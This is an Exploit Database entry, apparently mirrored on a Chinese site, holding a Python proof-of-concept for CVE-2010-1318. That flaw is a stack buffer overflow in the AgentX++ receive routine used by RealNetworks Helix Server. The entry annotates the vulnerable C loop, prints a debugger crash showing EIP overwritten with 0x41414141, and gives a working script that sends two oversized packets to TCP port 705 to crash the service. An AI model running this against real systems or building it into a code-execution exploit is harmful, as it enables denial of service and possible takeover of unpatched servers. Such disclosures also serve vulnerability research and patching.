Multiple Vendor AgentX++ – Stack Buffer Overflow (PoC)

• Exploit Database
• 10 阅读

• 作者： ZSploit.com
  日期： 2010-04-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12274/

• # Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow
  Vulnerability
  # Date: 2010-04-17
  # Author: ZSploit.com
  # Software Link: N/A
  # Version: N/A
  # Tested on: RealNetworks Helix Server v11
  # CVE : CVE-2010-1318
  
  #! /usr/bin/env python
  ###############################################################################
  ## File :zs_agentx_bof.py
  ## Description:
  ##:
  ## Created_On :Apr 17 2010
  ##
  ## (c) Copyright 2010, ZSploit.com. all rights reserved.
  ###############################################################################
  """
  int AgentX::receive_agentx(int sd, AgentXPdu& pdu)
  {
  
  u_charbuffer[AGENTX_HEADER_LEN+1];[1]
  u_intpayloadLen;
  booleannetByteOrder;
  intstatus;
  
  //read header
  unsigned int bytesRead = 0;
  while (bytesRead < AGENTX_HEADER_LEN) { [2]
  #ifdef WIN32
  if ((status = recv(sd, (char*)(buffer+bytesRead),
   AGENTX_HEADER_LEN, 0)) <= 0) {
  
  if (status == 0) return AGENTX_DISCONNECT;
  if (status == SOCKET_ERROR) {
  LOG_BEGIN(ERROR_LOG | 1);
  LOG("AgentX: receive socket error (errno)");
  LOG(WSAGetLastError());
  LOG_END;
  return AGENTX_DISCONNECT;
  }
  else {
  LOG_BEGIN(ERROR_LOG | 1);
  LOG("AgentX: receive unknown error (status)");
  LOG(status);
  LOG_END;
  return AGENTX_DISCONNECT;
  }
  }
  #else
  if ((status = read(sd, (void *)(buffer+bytesRead),
   AGENTX_HEADER_LEN)) <= 0) {
  
  if (status == 0) return AGENTX_DISCONNECT;
  if (errno == EBADF) return AGENTX_BADF;
  else {
  LOG_BEGIN(ERROR_LOG | 1);
  LOG("AgentX: receive unknown error (errno)");
  LOG(errno);
  LOG_END;
  return AGENTX_ERROR;
  }
  }
  #endif
  bytesRead += status;
  }
  
  
  [1] Allocates 0x14 bytes stack buffer
  [2] The check should be consider the remainder bytes of the buffer
  
  if we only send the data < 0x13 bytes, 2 packets will overwrite the stack
  buffer.
  
  0:009> g
  (728.a3c): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14
  edi=00ccff80
  eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0 nv up ei pl nz na po
  nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000
  efl=00010202
  41414141 ?????
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for
  C:\WINDOWS\system32\mswsock.dll -
  0:006> k
  ChildEBP RetAddr
  WARNING: Frame IP not in any known module. Following frames may be wrong.
  00cbfd04 00edda20 0x41414141
  00cbfd18 7c829fb5 0xedda20
  00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38
  00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126
  00000000 00000000 mswsock+0x1a03
  
  """
  
  import sys
  import socket
  
  if (len(sys.argv) != 2):
  print "Usage:\t%s [target]" % sys.argv[0]
  sys.exit(0)
  
  
  data = "A" * 19
  
  host = sys.argv[1]
  port = 705
  
  print "PoC for CVE-2010-1318 by ZSploit.com"
  try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
  s.connect((host, port))
  print "Sending payload .."
  s.send(data)
  s.send(data)
  except:
  print "Error in send"
  print "Done"
  except:
  print "Error in socket"